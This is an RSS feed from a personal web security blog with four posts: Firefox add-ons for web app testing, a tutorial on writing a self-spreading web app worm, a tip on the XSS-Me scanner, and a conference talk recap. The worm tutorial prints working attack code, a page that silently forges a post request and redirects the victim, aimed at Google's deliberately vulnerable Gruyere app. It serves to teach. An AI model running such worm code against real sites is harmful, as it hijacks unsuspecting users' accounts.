<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title> &#187; XSS</title>
	<atom:link href="http://travisaltman.com/category/xss/feed/" rel="self" type="application/rss+xml" />
	<link>http://travisaltman.com</link>
	<description></description>
	<lastBuildDate>Sat, 24 Mar 2012 04:16:19 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3</generator>
		<item>
		<title>Firefox add-ons for web app assessments</title>
		<link>http://travisaltman.com/firefox-add-ons-for-web-app-assessments/</link>
		<comments>http://travisaltman.com/firefox-add-ons-for-web-app-assessments/#comments</comments>
		<pubDate>Fri, 04 Feb 2011 03:34:31 +0000</pubDate>
		<dc:creator>travis</dc:creator>
				<category><![CDATA[SQL injection]]></category>
		<category><![CDATA[web security]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://travisaltman.com/?p=339</guid>
		<description><![CDATA[These add-ons are mainly related to web application security, you see these types of list related to firefox add-ons but these are the ones that I think are the most helpful. Firefox has a nice category called web application security penetration testing that has a lot of the plugins I&#8217;ll mention.  Not all plugins in [...]]]></description>
			<content:encoded><![CDATA[<p>These add-ons are mainly related to web application security, you see these types of list related to firefox add-ons but these are the ones that I think are the most helpful. Firefox has a nice category called <a href="https://addons.mozilla.org/en-US/firefox/collections/adammuntner/webappsec/" target="_blank">web application security penetration testing</a> that has a lot of the plugins I&#8217;ll mention.  Not all plugins in this category are worthwhile which is why I&#8217;m sharing my list.</p>
<p>Detecting <a href="http://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29" target="_blank">cross site scripting</a></p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/xss-me/" target="_blank">XSS &#8211; me</a></p>
<p><a href="http://travisaltman.com/tools/ffacuscan.xpi" target="_blank">Acunetix xss scanner</a></p>
<p>I&#8217;ve included the link to the Acunetix add-on from my site. You have to sign up with Acunetix in order to receive the add-on and even then it comes bundled with an executable. If for some reason my link doesn&#8217;t work with your version of firefox then simply go to the Acunetix site and download their latest version.</p>
<p>Detecting <a href="http://www.owasp.org/index.php/SQL_Injection" target="_blank">sql injection</a></p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/sql-inject-me/?src=collection&amp;collection_id=6fa2752d-f181-3d1d-bccf-508f5ff7c939" target="_blank">SQL inject me</a></p>
<p>Developer tools are always handy to have because if you can build it you can break it. The web developer add-on will allow you to easily see hidden form fields, javascript, cookies, etc. Firebug will allow you to easily see how the application is built by simply mouseing over the layout. Firebug is also a debugger and will allow you to set breakpoints for javascript, both are a must have.</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/firebug/?src=collection&amp;collection_id=6fa2752d-f181-3d1d-bccf-508f5ff7c939" target="_blank">Firebug</a></p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/web-developer/?src=collection&amp;collection_id=6fa2752d-f181-3d1d-bccf-508f5ff7c939" target="_blank">Web developer</a></p>
<p>Modification tools, if you want to modify a request before it&#8217;s sent to the server tamper data is a great tool inside the browser for the job. User agent switcher will allow you to pretend to be any browser you&#8217;d like, don&#8217;t forget the starbucks iphone problem. Add n edit cookies is another modification tool that will allow you to easily change cookies so that you can impersonate a cookie you have obtained.</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/tamper-data/?src=collection&amp;collection_id=6fa2752d-f181-3d1d-bccf-508f5ff7c939" target="_blank">Tamper data</a></p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/?src=collection&amp;collection_id=6fa2752d-f181-3d1d-bccf-508f5ff7c939" target="_blank">User agent switcher</a></p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/add-n-edit-cookies/?src=collection&amp;collection_id=6fa2752d-f181-3d1d-bccf-508f5ff7c939" target="_blank">Add n edit cookies</a></p>
<p>Miscellaneous add-ons. Show IP is a great add-on that will show you the IP connecting to, this may seem lame at first but when you are assessing multiple environments or malware this is always handy. Leet key is another great tool inside the browser that will perform encoding (base64, URL, rot13, etc) and even generate <a href="http://en.wikipedia.org/wiki/Hash_function" target="_blank">hashes</a>.</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/showip/?src=collection&amp;collection_id=6fa2752d-f181-3d1d-bccf-508f5ff7c939" target="_blank">Show IP</a></p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/leet-key/?src=collection&amp;collection_id=6fa2752d-f181-3d1d-bccf-508f5ff7c939" target="_blank">Leet key</a></p>
<p>Notable mentions</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/" target="_blank">Foxy proxy</a></p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/noscript/" target="_blank">Noscript</a></p>
<p>If you have any other recommendations please let me know.</p>
]]></content:encoded>
			<wfw:commentRss>http://travisaltman.com/firefox-add-ons-for-web-app-assessments/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to write a web app worm</title>
		<link>http://travisaltman.com/how-to-write-a-web-app-worm/</link>
		<comments>http://travisaltman.com/how-to-write-a-web-app-worm/#comments</comments>
		<pubDate>Sat, 06 Nov 2010 04:54:46 +0000</pubDate>
		<dc:creator>travis</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[web security]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://travisaltman.com/?p=310</guid>
		<description><![CDATA[When I say web app worm I mean a web site specific worm such as twitter. Twitter has been picked on (they should be because it&#8217;s a meaningless app) when it comes to web app worms so why stop now. There are other types of worms that could include web servers and databases but that [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://travisaltman.com/wp-content/worm.png"><img class="size-full wp-image-313 alignleft" title="worm" src="http://travisaltman.com/wp-content/worm.png" alt="" width="107" height="180" /></a>When I say web app worm I mean a web site specific worm such as twitter. Twitter <a href="http://www.metro.co.uk/tech/842197-wtf-worm-sees-twitter-swamped-by-goat-sex" target="_blank">has been picked</a> on (they should be because it&#8217;s a meaningless app) when it comes to <a href="http://www.guardian.co.uk/technology/pda/2010/sep/22/twitter-onmouseover-worm" target="_blank">web app worms</a> so why stop now. There are other types of worms that could include web servers and databases but that won&#8217;t be addressed in this write up. The web app I&#8217;ll pick on for this example is <a href="http://google-gruyere.appspot.com/" target="_blank">Gruyere</a>. Gruyere is an intentional vulnerable application that a handful of folks over at google wrote to point out some of the major vulnerabilities within web applications. Gruyere is very twitter like so my example would be relevant to other applications that function in similar ways.</p>
<p>Most web site worms spread because they allow javascript to be inserted somewhere into the web application. For example in twitter when a status is updated (via a moronic &#8220;tweet&#8221;) you are allowed to insert words, sentences, and even links to other interesting sites. If twitter allows you to input all this information what do they block? Javascript is a well known programming language that you should never allow to be inserted into your web application. Even though many web developers know this they continually make mistakes and allow javascript to be inserted into their web apps. There are different categories of javascript attacks such as <a href="http://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29" target="_blank">XSS</a> and <a href="http://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29" target="_blank">XSRF</a>, I&#8217;m not a big fan of this naming convention but  you should be familiar with the terms and what they mean. Most all web app worms are spread via the XSRF attack. Basically a XSRF attack is where javascript (possibly other languages) is inserted into the web app, that javascript will then make a request on behalf of the user. This request could be malicious in nature or in case of the twitter worm examples just for fun. The example I&#8217;ll be going over will be a classic XSRF attack where I&#8217;ll insert javascript to make requests on behalf of the user.</p>
<p>Let&#8217;s get started. I went ahead and created several accounts within Gruyere to demo the attack, in this case Travis will be the attacker.</p>
<p><a href="http://travisaltman.com/wp-content/Selection_082.png"><img class="size-full wp-image-317 alignnone" title="Selection_082" src="http://travisaltman.com/wp-content/Selection_082.png" alt="" width="370" height="249" /></a></p>
<p>To create a web app worm first you&#8217;ll need to discover a vulnerability within a web app that allows you to insert javascript. Luckily the &#8220;New Snippet&#8221; functionality will allow us to insert javascript. Now to find vulnerable input that allows you to insert javascript may not be that easy. In order to successfully insert javascript you&#8217;ll need to be able to insert certain characters such as &#8220;&lt;&#8221; and &#8220;&gt;&#8221;. One great tool to find these characters which will in turn find vulnearbilities is <a href="https://addons.mozilla.org/en-US/firefox/addon/7598/" target="_blank">Firefox addon named &#8220;XSS Me&#8221;</a>. XSS Me will tell if an input will allow certain characters. So now that we have vulnerable input how do we get this worm started? As the attacker I will place the following link into a new snippet.</p>
<p><a href="http://travisaltman.com/wp-content/Selection_083.png"><img class="alignnone size-full wp-image-320" title="Selection_083" src="http://travisaltman.com/wp-content/Selection_083.png" alt="" width="589" height="93" /></a></p>
<p>Now all I&#8217;m doing here is creating a link to my evil code, to create a worm you don&#8217;t have to keep your evil code in another location you could insert all the evil code you need into the vulnerable web app itself. Most of the time inserting all of your evil code into the app itself would be ideal but it really depends on what the vulnerable app will allow you to do. Now that we&#8217;ve inserted a link to our evil code what exactly does our evil code look like, below is the source code in evil.html.</p>
<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><table cellspacing="0" cellpadding="0"><tbody><tr><td style="padding:5px;text-align:center;color:#888888;background-color:#EEEEEE;border-right: 1px solid #9F9F9F;font: normal 12px/1.4em Monaco, Lucida Console, monospace;"><div>1<br />2<br />3<br />4<br />5<br />6<br />7<br />8<br />9<br />10<br />11<br /></div></td><td><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap">&lt;p &lt;body onload=&quot;Wait();&quot;&gt;&lt;img src=&quot;http://google-gruyere.appspot.com/251625447516/newsnippet2?snippet=%3Ca%20href%3D%22http%3A%2F%2Ftravisaltman.com%2Fevil.html%22%3Ekitten%20videos%3C%2Fa%3E&quot;&gt;<br />
&lt;script&gt;<br />
function Redirect()<br />
{<br />
window.location=&quot;http://google-gruyere.appspot.com/251625447516/&quot;;<br />
}<br />
function Wait()<br />
{<br />
setTimeout(&quot;Redirect()&quot;, 1000);<br />
}<br />
&lt;/script&gt;</div></td></tr></tbody></table></div>
<p>Now let&#8217;s break evil.html down line by line. All the magic is happening in line one. The first thing that is written is the html paragraph tag &#8220;&lt;p&#8221;, this is done specifically for this app because anything after the &lt;p&gt; tag would allow other characters. Next is the html body tag with an &#8220;onload&#8221; action. An action in malicious code is common so that the attacker perform other steps, another common action event is an onmouseover event. Once the page loads it will call the &#8220;Wait&#8221; function, we&#8217;ll come back to that in just a bit. After the wait is the image tag (&lt;img&gt;) to make the XSRF request for me. The request is to add a new snippet to whomever clicks on the link. In this case if a victim were to click on my link it would create a new snippet for them with a link saying &#8220;kitten videos&#8221;. To add a new snippet within Gruyere the url would be the following</p>
<div class="codecolorer-container html4strict blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="html4strict codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap">http://google-gruyere.appspot.com/251625447516/newsnippet2?snippet=</div></div>
<p>Anything after the equal sign would show up as a new snippet so I inserted the following &#8220;malicious&#8221; snippet</p>
<div class="codecolorer-container html4strict blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="html4strict codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap">%3Ca%20href%3D%22http%3A%2F%2Ftravisaltman.com%2Fevil.html%22%3Ekitten%20videos%3C%2Fa%3E</div></div>
<p>So what does all that mess mean? If you take all that mess and url decode it&#8217;s the following.</p>
<div class="codecolorer-container html4strict blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="html4strict codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap"><span style="color: #009900;">&lt;<a href="http://december.com/html/4/element/a.html"><span style="color: #000000; font-weight: bold;">a</span></a> <span style="color: #000066;">href</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;http://travisaltman.com/evil.html&quot;</span>&gt;</span>kitten videos<span style="color: #009900;">&lt;<span style="color: #66cc66;">/</span><a href="http://december.com/html/4/element/a.html"><span style="color: #000000; font-weight: bold;">a</span></a>&gt;</span></div></div>
<p>In this case I had to <a href="http://meyerweb.com/eric/tools/dencoder/" target="_blank">url encode</a> my attack so that it would work, this is not uncommon when performing these types of attacks. So as the attacker I&#8217;m placing a link inside a new snippet for the victim that says &#8220;kitten videos&#8221; but that link is still pointing to my evil.html. Now let&#8217;s get back to the wait function. I won&#8217;t break it down line by line but what happens is when the page fully loads the code will jump to the wait function on line seven. After that setTimeout will execute after one second which calls the Redirect function, the Redirect function will redirect the user to the home page of Gruyere. The whole point of everything after line one is to simply redirect the user back to the homepage after the attack. So now that we have planted the seed of attack let&#8217;s see what happens when Alice clicks on our evil link.</p>
<p><a href="http://travisaltman.com/wp-content/Selection_084.png"><img class="alignnone size-full wp-image-328" title="Selection_084" src="http://travisaltman.com/wp-content/Selection_084.png" alt="" width="355" height="237" /></a></p>
<p>Just by clicking on our &#8220;evil&#8221; link Alice created a snippet that she herself didn&#8217;t write, it was our malicious javascript that created the link. Now let&#8217;s login as Bob and click on the &#8220;kitten videos&#8221; in Alice&#8217;s snippets.</p>
<p><a href="http://travisaltman.com/wp-content/Selection_086.png"><img class="alignnone size-full wp-image-331" title="Selection_086" src="http://travisaltman.com/wp-content/Selection_086.png" alt="" width="373" height="238" /></a></p>
<p>Bob has now updated his snippets just by simply clicking on the link in Alice&#8217;s snippet. You can now see how this can snowball much like other web app worms have spread as well. So in only a few lines of code I have created a worm that will replicate throughout the application infecting whomever clicks on my malicious link. The twitter worm was <a href="http://www.wait-till-i.com/2010/09/26/new-twitter-exploit-how-it-works/" target="_blank">very simple</a> as well. I could have just as easily made it that if a user were to simply view my snippet that they would get infected as well. Once you allow javascript to be inserted into your app that are a number of things an attacker can do to manipulate your application.</p>
<p>Hopefully this small write up at least some what explains how web app worms get created and how simple they can be. Developers of major applications such as twitter need to better test and review code they have written. As one of my links points out a seventeen year old kid exploited the mighty twitter, just goes to show you how well major applications are focusing on their security. As a user I would never click on a link that you don&#8217;t trust and turn off javascript for web apps that don&#8217;t need javascript in the first place. If another worm pops up in twitter or facebook I won&#8217;t be sad.</p>
]]></content:encoded>
			<wfw:commentRss>http://travisaltman.com/how-to-write-a-web-app-worm/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>XSS-Me tool &amp; html frames</title>
		<link>http://travisaltman.com/xss-me-tool-html-frames/</link>
		<comments>http://travisaltman.com/xss-me-tool-html-frames/#comments</comments>
		<pubDate>Tue, 15 Jul 2008 05:48:20 +0000</pubDate>
		<dc:creator>travis</dc:creator>
				<category><![CDATA[SQL injection]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://travisaltman.com/xss-me-tool-html-frames/</guid>
		<description><![CDATA[Security Compass has created a series of Firefox add-ons that aid in performing web application assessment. These tools are a great convenient way of finding vulnerabilities within web applications. I do want to point out that even though these tools are useful there is no guarantee all vulnerabilities will be found.
XSS-Me is one of the [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.securitycompass.com/">Security Compass</a> has created a <a href="https://addons.mozilla.org/en-US/firefox/user/1792636">series of Firefox add-ons</a> that aid in performing web application assessment. These tools are a great convenient way of finding vulnerabilities within web applications. I do want to point out that even though these tools are useful there is no guarantee all vulnerabilities will be found.</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/7598">XSS-Me</a> is one of the tools in the series that helps to find cross site scripting (<a href="http://www.darkreading.com/document.asp?doc_id=103774&amp;WT.svl=news1_1">XSS</a>) vulnerabilities within web applications. The tool works by locating forms within a web page then tries various inputs into those forms to see if the inputs on that page are vulnerable. A screen shot of how the tool should look inside Firefox can be seen below.</p>
<p align="center"><a href="http://travisaltman.com/wp-content/travisaltman.png" title="How XSS-Me should look inside Firefox"><img src="http://travisaltman.com/wp-content/travisaltman.png" alt="How XSS-Me should look inside Firefox" align="left" /></a></p>
<p align="left">&nbsp;</p>
<p align="left">Now all you have to do is click &#8220;Run all tests&#8221; and let XSS-Me do its thing. Keep in mind that XSS-Me will also find any hidden forms within a page as well. So this is how things are suppose to work but you&#8217;ll eventually come across a page that has forms but XSS-Me doesn&#8217;t detect them, this is because the page you are viewing has <a href="http://www.w3schools.com/HTML/html_frames.asp">frames</a>. A good example of this is <a href="http://em386.blogspot.com/">Chris Rohlf&#8217;s</a> site seen below.</p>
<p align="left"><a href="http://travisaltman.com/wp-content/em386homepage.png" title="XSS-Me doesnâ€™t detect the search form"><img src="http://travisaltman.com/wp-content/em386homepage.png" alt="XSS-Me doesnâ€™t detect the search form" /></a></p>
<p align="left">From the screen shot you can see there is a search form at the top of the page but XSS-Me doesn&#8217;t detect its presence. This is because the search form is wrapped inside of a frame. A quick little tip to get around this problem is to open the frame in another tab/window. All you have to do in Firefox is right click on the frame then select &#8220;This Frame &gt; Open Frame in New Tab&#8221;. A screen shot can be seen below.</p>
<p align="left"><a href="http://travisaltman.com/wp-content/rightclick.jpg" title="Right click to open frame"><img src="http://travisaltman.com/wp-content/rightclick.jpg" alt="Right click to open frame" /></a></p>
<p align="left">Once you have the frame in a new tab XSS-Me will detect the form as normal. This can be seen in the screen shot below.</p>
<p align="left"><a href="http://travisaltman.com/wp-content/forminnewtab.png" title="Frame in new tab"><img src="http://travisaltman.com/wp-content/forminnewtab.png" alt="Frame in new tab" /></a></p>
<p align="left">This same technique will apply to the SQL Inject Me tool from Security Compass as well because it also tries to search for forms within a web page.</p>
<p align="left">This tip was passed along to me by Sahba Kazerooni who works at Security Compass. I have no affiliation with Security Compass but I met Sahba and some other Security Compass employees at a conference and they were all down to earth guys who had great knowledge and experience when it came to information security. So thanks for the tip Sahba and hopefully this tip will help others secure their web applications as well.</p>
<p align="left">&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://travisaltman.com/xss-me-tool-html-frames/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Carolina Con Presentation</title>
		<link>http://travisaltman.com/carolina-con-presentation/</link>
		<comments>http://travisaltman.com/carolina-con-presentation/#comments</comments>
		<pubDate>Wed, 09 Apr 2008 03:05:32 +0000</pubDate>
		<dc:creator>travis</dc:creator>
				<category><![CDATA[SMS]]></category>
		<category><![CDATA[video]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://travisaltman.com/carolina-con-presentation/</guid>
		<description><![CDATA[
It&#8217;s taken me a couple of days to recover from Carolina Con.  I knew it was going to be a riot with all the alcohol in walking distance.  Now that I have my equilibrium I can post my presentation on Layer 7 attacks.  My laptop and the projector weren&#8217;t working well together [...]]]></description>
			<content:encoded><![CDATA[<p align="center"><br /><img src="/wp-content/carolinaCon.jpg" alt="media" /><br />
[See post to watch Flash video]
<p>It&#8217;s taken me a couple of days to recover from <a href="http://www.carolinacon.org/" title="best party i've been to all year">Carolina Con</a>.  I knew it was going to be a riot with all the alcohol in walking distance.  Now that I have my equilibrium I can post my presentation on Layer 7 attacks.  My laptop and the projector weren&#8217;t working well together so I had to borrow Nick Fury&#8217;s laptop which didn&#8217;t have all the tools I needed for the presentation, so I wasn&#8217;t able to present the second half of my talk.  I&#8217;m hoping this video will compensate.  Keep in mind that my total presentation was going to include this video (scenario 1, cross site texting) and my previous video post of <a href="http://travisaltman.com/video-tutorial-on-analyzing-cookies/">analyzing cookies</a> (scenario 2).  One thing you won&#8217;t see in this screen cast is that during the presentation I used a volunteer from the audience to prove that an attacker could text himself the username and password of an unsuspecting victim.  Luckily <a href="http://www.rmyou.org/cc_pic/apples%20and%20kage.jpg">apples</a> from the <a href="http://hackthissite.org/" title="these guys get a 10 / 10">HTS</a> crew let me spam his phone with my demo and all he got was a t-shirt, a kick ass Carolina Con t-shirt that is.  Well I had a great time and I&#8217;ll definitely make it back next year.  As always I would love to hear your comments and feedback.</p>
<p>travis:~$ cat BigUpsMuchRespect</p>
<ol>
<li><a href="http://www.nc2600.org/index.html">nc2600</a></li>
<li><a href="http://www.donkeyonawaffle.org/">txs</a></li>
<li><a href="http://www.atarininja.org/">wxs</a></li>
<li><a href="http://www.layereddefense.com/">Deral Heiland</a></li>
<li><a href="http://www.securitycompass.com/">Sahba &amp; Dan @ Security Compass</a></li>
</ol>
]]></content:encoded>
			<wfw:commentRss>http://travisaltman.com/carolina-con-presentation/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<enclosure url="/wp-content/carolinaCon.flv" length="1" type="video/x-flv"/>
	</item>
	</channel>
</rss>

